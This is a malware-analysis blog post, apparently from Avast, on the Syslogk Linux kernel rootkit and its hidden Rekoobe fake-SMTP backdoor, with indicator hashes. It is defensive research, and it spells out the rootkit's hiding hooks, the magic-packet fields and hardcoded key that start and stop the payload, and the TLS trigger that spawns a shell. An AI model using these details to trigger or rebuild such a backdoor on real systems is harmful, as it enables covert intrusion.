Rootkits are dangerous pieces of malware. Once in place, they are usually really hard to detect. Their code is typically more challenging to write than other malware, so developers resort to code reuse from open source projects. As rootkits are very interesting to analyze, we are always looking out for these kinds of samples in the wild.

Adore-Ng is a relatively old, open-source, well-known kernel rootkit for Linux, which initially targeted kernel 2.x but is currently updated to target kernel 3.x. It enables hiding processes, files, and even the kernel module, making it harder to detect. It also allows authenticated user-mode processes to interact with the rootkit to control it, allowing the attacker to hide many custom malicious artifacts by using a single rootkit.

In early 2022, we were analyzing a rootkit mostly based on Adore-Ng that we found in the wild, apparently under development. After obtaining the sample, we examined the .modinfo section and noticed it is compiled for a specific kernel version.

As you may know, even if it is possible to ‘force load’ the module into the kernel by using the --force flag of the insmod Linux command, this operation can fail if the required symbols are not found in the kernel; this can often lead to a system crash.

insmod -f {module}

We discovered that the kernel module could be successfully loaded without forcing into a default Centos 6.10 distribution, as the rootkit we found is compiled for a similar kernel version.

While looking at the file’s strings, we quickly identified the PgSD93ql hardcoded file name in the kernel rootkit to reference the payload. This payload file name is likely used to make it less obvious for the sysadmin, for instance, it can look like a legitimate PostgreSQL file.

Using this hardcoded file name, we extracted the file hidden by the rootkit. It is a compiled backdoor trojan written in C programming language; Avast’s antivirus engine detects and classifies this file as ELF:Rekoob – which is widely known as the Rekoobe malware family. Rekoobe is a piece of code implanted in legitimate servers. In this case it is embedded in a fake SMTP server, which spawns a shell when it receives a specially crafted command. In this post, we refer to this rootkit as Syslogk rootkit, due to how it ‘reveals’ itself when specially crafted data is written to the file /proc/syslogk .

Analyzing the Syslogk rootkit

The Syslogk rootkit is heavily based on Adore-Ng but incorporates new functionalities making the user-mode application and the kernel rootkit hard to detect.

Loading the kernel module

To load the rootkit into kernel space, it is necessary to approximately match the kernel version used for compiling; it does not have to be strictly the same.

vermagic=2.6.32-696.23.1.el6.x86_64 SMP mod_unload modversions

For example, we were able to load the rootkit without any effort in a Centos 6.10 virtual machine by using the insmod Linux command.

After loading it, you will notice that the malicious driver does not appear in the list of loaded kernel modules when using the lsmod command.

Revealing the rootkit

The rootkit has a hide_module function which uses the list_del function of the kernel API to remove the module from the linked list of kernel modules. Next, it also accordingly updates its internal module_hidden flag.

Fortunately, the rootkit has a functionality implemented in the proc_write function that exposes an interface in the /proc file system which reveals the rootkit when the value 1 is written into the file /proc/syslogk.

Once the rootkit is revealed, it is possible to remove it from memory using the rmmod Linux command. The Files section of this post has additional details that will be useful for programmatically uncloaking the rootkit.

Overview of the Syslogk rootkit features

Apart from hiding itself, making itself harder to detect when implanted, Syslogk can completely hide the malicious payload by taking the following actions:

  • The hk_proc_readdir function of the rootkit hides directories containing malicious files, effectively hiding them from the operating system.
  • The malicious processes are hidden via hk_getpr – a mix of Adore-Ng functions for hiding processes.
  • The malicious payload is hidden from tools like Netstat; when running, it will not appear in the list of services. For this purpose, the rootkit uses the function hk_t4_seq_show.
  • The malicious payload is not continuously running. The attacker remotely executes it on demand when a specially crafted TCP packet (details below) is sent to the infected machine, which inspects the traffic by installing a netfilter hook.
  • It is also possible for the attacker to remotely stop the payload. This requires using a hardcoded key in the rootkit and knowledge of some fields of the magic packet used for remotely starting the payload. 

We observed that the Syslogk rootkit (and Rekoobe payload) perfectly align when used covertly in conjunction with a fake SMTP server. Consider how stealthy this could be; a backdoor that does not load until some magic packets are sent to the machine. When queried, it appears to be a legitimate service hidden in memory, hidden on disk, remotely ‘magically’ executed, hidden on the network. Even if it is found during a network port scan, it still seems to be a legitimate SMTP server.

For compromising the operating system and placing the mentioned hiding functions, Syslogk uses the already known set_addr_rw and set_addr_ro rootkit functions, which adds or removes writing permissions to the Page Table Entry (PTE) structure.

After adding writing permissions to the PTE, the rootkit can hook the functions declared in the hks internal rootkit structure.

PTE Hooks
Type of the function Offset Name of the function
Original hks+(0x38) * 0 proc_root_readdir
Hook hks+(0x38) * 0 + 0x10 hk_proc_readdir
Original hks+(0x38) * 1 tcp4_seq_show
Hook hks+(0x38) * 1 + 0x10 hk_t4_seq_show
Original hks+(0x38) * 2 sys_getpriority
Hook hks+(0x38) * 2 + 0x10 hk_getpr

The mechanism for placing the hooks consists of identifying the hookable kernel symbols via /proc/kallsyms as implemented in the get_symbol_address function of the rootkit (code reused from this repository). After getting the address of the symbol, the Syslogk rootkit uses the udis86 project for hooking the function.

Understanding the directory hiding mechanism

The Virtual File System (VFS) is an abstraction layer that allows for FS-like operation over something that is typically not a traditional FS. As it is the entry point for all the File System queries, it is a good candidate for the rootkits to hook.

It is not surprising that the Syslogk rootkit hooks the VFS functions for hiding the Rekoobe payload stored in the file /etc/rc-Zobk0jpi/PgSD93ql .

The hook is done by hk_root_readdir which calls to nw_root_filldir where the directory filtering takes place.

As you can see, any directory containing the substring -Zobk0jpi will be hidden.

The function hk_get_vfs opens the root of the file system by using filp_open. This kernel function returns a pointer to the structure file, which contains a file_operations structure called f_op that finally stores the readdir function hooked via hk_root_readdir.

Of course, this feature is not new at all. You can check the source code of Adore-Ng and see how it is implemented on your own.

Understanding the process hiding mechanism

In the following screenshot, you can see that the Syslogk rootkit (code at the right margin of the screenshot) is prepared for hiding a process called PgSD93ql. Therefore, the rootkit seems more straightforward than the original version (see Adore-Ng at the left margin of the screenshot). Furthermore, the process to hide can be selected after authenticating with the rootkit.

The Syslogk rootkit function hk_getpr explained above, is a mix of adore_find_task and should_be_hidden functions but it uses the same mechanism for hiding processes.

Understanding the network traffic hiding mechanism

The Adore-Ng rootkit allows hiding a given set of listening services from Linux programs like Netstat. It uses the exported proc_net structure to change the tcp4_seq_show( ) handler, which is invoked by the kernel when Netstat queries for listening connections. Within the adore_tcp4_seq_show() function, strnstr( ) is used to look in seq->buf for a substring that contains the hexadecimal representation of the port it is trying to hide. If this is found, the string is deleted.

In this way, the backdoor will not appear when listing the connections in an infected machine. The following section describes other interesting capabilities of this rootkit.

Understanding the magic packets

Instead of continuously running the payload, it is remotely started or stopped on demand by sending specially crafted network traffic packets.

These are known as magic packets because they have a special format and special powers. In this implementation, an attacker can trigger actions without having a listening port in the infected machine such that the commands are, in some way, ‘magically’ executed in the system.

Starting the Rekoobe payload

The magic packet inspected by the Syslogk rootkit for starting the Rekoobe fake SMTP server is straightforward. First, it checks whether the packet is a TCP packet and, in that case, it also checks the source port, which is expected to be 59318.

Rekobee will be executed by the rootkit if the magic packet fits the mentioned criteria.

Of course, before executing the fake service, the rootkit terminates all existing instances of the program by calling the rootkit function pkill_clone_0. This function contains the hardcoded process name PgSD93ql;  it only kills the Rekoobe process by sending the KILL signal via send_sig.

To execute the command that starts the Rekoobe fake service in user mode, the rootkit executes the following command by combining the kernel APIs: call_usermodehelper_setup, call_usermodehelper_setfns, and call_usermodehelper_exec.

/bin/sh -c /etc/rc-Zobk0jpi/PgSD93ql

The Files section of this post demonstrates how to manually craft (using Python) the TCP magic packet for starting the Rekoobe payload.

In the next section we describe a more complex form of the magic packet.

Stopping the Rekoobe payload

Since the attacker doesn’t want any other person in the network to be able to kill Rekoobe, the magic packet for killing Rekoobe must match some fields in the previous magic packet used for starting Rekoobe. Additionally, the packet must satisfy additional requirements – it must contain a key that is hardcoded in the rootkit and located in a variable offset of the magic packet. The conditions that are checked:

  1. It checks a flag enabled when the rootkit executes Rekoobe via magic packets. It will only continue if the flag is enabled.
  2. It checks the Reserved field of the TCP header to see that it is 0x08.
  3. The Source Port must be between 63400 and 63411 inclusive.
  4. Both the Destination Port and the Source Address, must to be the same that were used when sending the magic packet for starting Rekoobe.
  5. Finally, it looks for the hardcoded key. In this case, it is: D9sd87JMaij

The offset of the hardcoded key is also set in the packet and not in a hardcoded offset; it is calculated instead. To be more precise, it is set in the data offset byte (TCP header) such that after shifting the byte 4 bits to the right and multiplying it by 4, it points to the offset of where the Key is expected to be (as shown in the following screenshot, notice that the rootkit compares the Key in reverse order).

In our experiments, we used the value 0x50 for the data offset (TCP header) because after shifting it 4 bits, you get 5 which multiplied by 4 is equal to 20. Since 20 is precisely the size of the TCP Header, by using this value, we were able to put the key at the start of the data section of the packet.

If you are curious about how we implemented this magic packet from scratch, then please see the Files section of this blog post.

Analyzing Rekoobe

When the infected machine receives the appropriate magic packet, the rootkit starts the hidden Rekoobe malware in user mode space.

It looks like an innocent SMTP server, but there is a backdoor command on it that can be executed when handling the starttls command. In a legitimate service, this command is sent by the client to the server to advise that it wants to start TLS negotiation.

For triggering the Rekoobe backdoor command (spawning a shell), the attacker must send the byte 0x03 via TLS, followed by a Tag Length Value (TLV) encoded data. Here, the tag is the symbol %, the length is specified in four numeric characters, and the value (notice that the length and value are arbitrary but can not be zero).

Additionally, to establish the TLS connection, you will need the certificate embedded in Rekoobe.

See the Files section below for the certificate and a Python script we developed to connect with Rekoobe.

The origin of Rekoobe payload and Syslogk rootkit

Rekoobe is clearly based on the TinySHell open source project; this is based on ordering observed in character and variables assignment taking place in the same order multiple times.

On the other hand, if you take a look at the Syslogk rootkit, even if it is new, you will notice that there are also references to TinySHell dating back to December 13, 2018.

The evidence suggests that the threat actor developed Rekoobe and Syslogk to run them  together. We are pleased to say that our users are protected and hope that this research assists others.


One of the architectural advantages of security software is that it usually has components running in different privilege levels; malware running on less-privileged levels cannot easily interfere with processes running on higher privilege levels, thus allowing more straightforward dealing with malware.

On the other hand, kernel rootkits can be hard to detect and remove because these pieces of malware run in a privileged layer. This is why it is essential for system administrators and security companies to be aware of this kind of malware and write protections for their users as soon as possible.


Syslogk sample

  • 68facac60ee0ade1aa8f8f2024787244c2584a1a03d10cda83eeaf1258b371f2

Rekoobe sample

  • 11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d

Other Rekoobe samples

  • fa94282e34901eba45720c4f89a0c820d32840ae49e53de8e75b2d6e78326074
  • fd92e34675e5b0b8bfbc6b1f3a00a7652e67a162f1ea612f6e86cca846df76c5
  • 12c1b1e48effe60eef7486b3ae3e458da403cd04c88c88fab7fca84d849ee3f5
  • 06778bddd457aafbc93d384f96ead3eb8476dc1bc8a6fbd0cd7a4d3337ddce1e
  • f1a592208723a66fa51ce1bc35cbd6864e24011c6dc3bcd056346428e4e1c55d
  • 55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b
  • df90558a84cfcf80639f32b31aec187b813df556e3c155a05af91dedfd2d7429
  • 160cfb90b81f369f5ba929aba0b3130cb38d3c90d629fe91b31fdef176752421
  • b4d0f0d652f907e4e77a9453dcce7810b75e1dc5867deb69bea1e4ecdd02d877
  • 3a6f339df95e138a436a4feff64df312975a262fa16b75117521b7d6e7115d65
  • 74699b0964a2cbdc2bc2d9ca0b2b6f5828b638de7c73b1d41e7fe26cfc2f3441
  • 7a599ff4a58cb0672a1b5e912a57fcdc4b0e2445ec9bc653f7f3e7a7d1dc627f
  • f4e3cfeeb4e10f61049a88527321af8c77d95349caf616e86d7ff4f5ba203e5f
  • 31330c0409337592e9de7ac981cecb7f37ce0235f96e459fefbd585e35c11a1a
  • c6d735b7a4656a52f3cd1d24265e4f2a91652f1a775877129b322114c9547deb
  • 2e81517ee4172c43a2084be1d584841704b3f602cafc2365de3bcb3d899e4fb8
  • b22f55e476209adb43929077be83481ebda7e804d117d77266b186665e4b1845
  • a93b9333a203e7eed197d0603e78413013bd5d8132109bbef5ef93b36b83957c
  • 870d6c202fcc72088ff5d8e71cc0990777a7621851df10ba74d0e07d19174887
  • ca2ee3f30e1c997cc9d8e8f13ec94134cdb378c4eb03232f5ed1df74c0a0a1f0
  • 9d2e25ec0208a55fba97ac70b23d3d3753e9b906b4546d1b14d8c92f8d8eb03d
  • 29058d4cee84565335eafdf2d4a239afc0a73f1b89d3c2149346a4c6f10f3962
  • 7e0b340815351dab035b28b16ca66a2c1c7eaf22edf9ead73d2276fe7d92bab4
  • af9a19f99e0dcd82a31e0c8fc68e89d104ef2039b7288a203f6d2e4f63ae4d5c
  • 6f27de574ad79eb24d93beb00e29496d8cfe22529fc8ee5010a820f3865336a9
  • d690d471b513c5d40caef9f1e37c94db20e6492b34ea6a3cddcc22058f842cf3
  • e08e241d6823efedf81d141cc8fd5587e13df08aeda9e1793f754871521da226
  • da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08
  • e3d64a128e9267640f8fc3e6ba5399f75f6f0aca6a8db48bf989fe67a7ee1a71
  • d3e2e002574fb810ac5e456f122c30f232c5899534019d28e0e6822e426ed9d3
  • 7b88fa41d6a03aeda120627d3363b739a30fe00008ce8d848c2cbb5b4473d8bc
  • 50b73742726b0b7e00856e288e758412c74371ea2f0eaf75b957d73dfb396fd7
  • 8b036e5e96ab980df3dca44390d6f447d4ca662a7eddac9f52d172efff4c58f8
  • 8b18c1336770fcddc6fe78d9220386bce565f98cc8ada5a90ce69ce3ddf36043
  • f04dc3c62b305cdb4d83d8df2caa2d37feeb0a86fb5a745df416bac62a3b9731
  • 72f200e3444bb4e81e58112111482e8175610dc45c6e0c6dcd1d2251bacf7897
  • d129481955f24430247d6cc4af975e4571b5af7c16e36814371575be07e72299
  • 6fc03c92dee363dd88e50e89062dd8a22fe88998aff7de723594ec916c348d0a
  • fca2ea3e471a0d612ce50abc8738085f076ad022f70f78c3f8c83d1b2ff7896b
  • 2fea3bc88c8142fa299a4ad9169f8879fc76726c71e4b3e06a04d568086d3470
  • 178b23e7eded2a671fa396dd0bac5d790bca77ec4b2cf4b464d76509ed12c51a
  • 3bff2c5bfc24fc99d925126ec6beb95d395a85bc736a395aaf4719c301cbbfd4
  • 14a33415e95d104cf5cf1acaff9586f78f7ec3ffb26efd0683c468edeaf98fd7
  • 8bb7842991afe86b97def19f226cb7e0a9f9527a75981f5e24a70444a7299809
  • 020a6b7edcff7764f2aac1860142775edef1bc057bedd49b575477105267fc67
  • 6711d5d42b54e2d261bb48aa7997fa9191aec059fd081c6f6e496d8db17a372a
  • 48671bc6dbc786940ede3a83cc18c2d124d595a47fb20bc40d47ec9d5e8b85dc
  • b0d69e260a44054999baa348748cf4b2d1eaab3dd3385bb6ad5931ff47a920de
  • e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94
  • fa0ea232ab160a652fcbd8d6db8ffa09fd64bcb3228f000434d6a8e340aaf4cb
  • 11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d
  • 73bbabc65f884f89653a156e432788b5541a169036d364c2d769f6053960351f
  • 8ec87dee13de3281d55f7d1d3b48115a0f5e4a41bfbef1ea08e496ac529829c8
  • 8285ee3115e8c71c24ca3bdce313d3cfadead283c31a116180d4c2611efb610d
  • 958bce41371b68706feae0f929a18fa84d4a8a199262c2110a7c1c12d2b1dce2
  • 38f357c32f2c5a5e56ea40592e339bac3b0cabd6a903072b9d35093a2ed1cb75
  • bcc3d47940ae280c63b229d21c50d25128b2a15ea42fe8572026f88f32ed0628
  • 08a1273ac9d6476e9a9b356b261fdc17352401065e2fc2ad3739e3f82e68705a
  • cf525918cb648c81543d9603ac75bc63332627d0ec070c355a86e3595986cbb3
  • 42bc744b22173ff12477e57f85fa58450933e1c4294023334b54373f6f63ee42
  • 337674d6349c21d3c66a4245c82cb454fea1c4e9c9d6e3578634804793e3a6d6
  • 4effa5035fe6bbafd283ffae544a5e4353eb568770421738b4b0bb835dad573b
  • 5b8059ea30c8665d2c36da024a170b31689c4671374b5b9b1a93c7ca47477448
  • bd07a4ccc8fa67e2e80b9c308dec140ca1ae9c027fa03f2828e4b5bdba6c7391
  • bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e
  • 79916343b93a5a7ac7b7133a26b77b8d7d0471b3204eae78a8e8091bfe19dc8c
  • c32e559568d2f6960bc41ca0560ac8f459947e170339811804011802d2f87d69
  • 864c261555fce40d022a68d0b0eadb7ab69da6af52af081fd1d9e3eced4aee46
  • 275d63587f3ac511d7cca5ff85af2914e74d8b68edd5a7a8a1609426d5b7f6a9
  • 031183e9450ad8283486621c4cdc556e1025127971c15053a3bf202c132fe8f9


Syslogk research tools

Rekoobe research tool

IoC repository

The Syslogk and Rekoobe rootkit research tools and IoCs are in our IoC repository.

The post Linux Threat Hunting: ‘Syslogk’ a kernel rootkit found under development in the wild appeared first on Avast Threat Labs.